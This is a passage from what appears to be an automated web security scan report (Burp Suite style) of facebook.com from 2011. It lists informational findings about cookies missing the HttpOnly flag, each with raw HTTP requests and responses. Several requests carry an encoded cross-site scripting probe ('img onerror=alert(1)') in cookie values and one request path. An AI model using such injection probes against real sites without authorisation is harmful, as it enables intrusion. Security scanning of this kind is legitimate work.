Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 404 Not Found
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.187.55
Connection: close
Date: Thu, 05 May 2011 11:43:11 GMT
Content-Length: 11470

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

11.40. http://www.facebook.com/1242845259

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /1242845259

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F1242845259; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1242845259 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F12; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; wd=1022x1007

Response

HTTP/1.1 404 Not Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F1242845259; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.96.57
X-Cnection: close
Date: Thu, 05 May 2011 11:56:38 GMT
Content-Length: 11260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

11.41. http://www.facebook.com/1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F12; path=/; domain=.facebook.com
  • reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; path=/; domain=.facebook.com
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; path=/; domain=.facebook.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://burp/show/12
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fhelp%2Fcontact.php%3Fshow_form%3Dcannot_identify%26flow%3Dpw_reset; wd=1022x1007

Response

HTTP/1.1 404 Not Found
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F12; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.102.67
X-Cnection: close
Date: Thu, 05 May 2011 11:56:26 GMT
Content-Length: 11478

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

11.42. http://www.facebook.com/2008/fbml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /2008/fbml

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F2008%2Ffbml; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2008/fbml HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 404 Not Found
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F2008%2Ffbml; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.145.67
Connection: close
Date: Thu, 05 May 2011 11:40:11 GMT
Content-Length: 11283

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

11.43. http://www.facebook.com/HockeyKen

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /HockeyKen

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FHockeyKen; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /HockeyKen HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FHockeyKen; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.195.39
Connection: close
Date: Thu, 05 May 2011 11:42:23 GMT
Content-Length: 79629

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

11.44. http://www.facebook.com/KickIceForever

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /KickIceForever

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FKickIceForever; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /KickIceForever HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FKickIceForever; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.194.43
Connection: close
Date: Thu, 05 May 2011 11:42:23 GMT
Content-Length: 72255

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

11.45. http://www.facebook.com/Loizza

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /Loizza

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FLoizza; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Loizza HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FLoizza; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.190.69
Connection: close
Date: Thu, 05 May 2011 11:42:51 GMT
Content-Length: 228078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

11.46. http://www.facebook.com/burkerkink

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /burkerkink

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fburkerkink; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /burkerkink HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fburkerkink; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.190.63
Connection: close
Date: Thu, 05 May 2011 11:42:28 GMT
Content-Length: 42388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

11.47. http://www.facebook.com/careers/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /careers/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcareers%2F; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /careers/ HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcareers%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-Powered-By: HPHP
X-FB-Server: 10.32.222.122
Connection: close
Date: Thu, 05 May 2011 10:56:36 GMT
Content-Length: 20487

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

11.48. http://www.facebook.com/deedee.perez1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /deedee.perez1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdeedee.perez1; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /deedee.perez1 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdeedee.perez1; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.165.57
Connection: close
Date: Thu, 05 May 2011 11:42:21 GMT
Content-Length: 77523

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

11.49. http://www.facebook.com/directory/pages/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /directory/pages/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpages%2F; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /directory/pages/ HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpages%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.155.51
Connection: close
Date: Thu, 05 May 2011 11:42:59 GMT
Content-Length: 44671

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

11.50. http://www.facebook.com/directory/people/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /directory/people/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpeople%2F; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /directory/people/ HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpeople%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.146.25
Connection: close
Date: Thu, 05 May 2011 11:42:57 GMT
Content-Length: 34484

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

11.51. http://www.facebook.com/fayse

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /fayse

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffayse; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fayse HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffayse; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.139.21
Connection: close
Date: Thu, 05 May 2011 11:42:45 GMT
Content-Length: 59713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

11.52. http://www.facebook.com/find-friends

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /find-friends

Issue detail

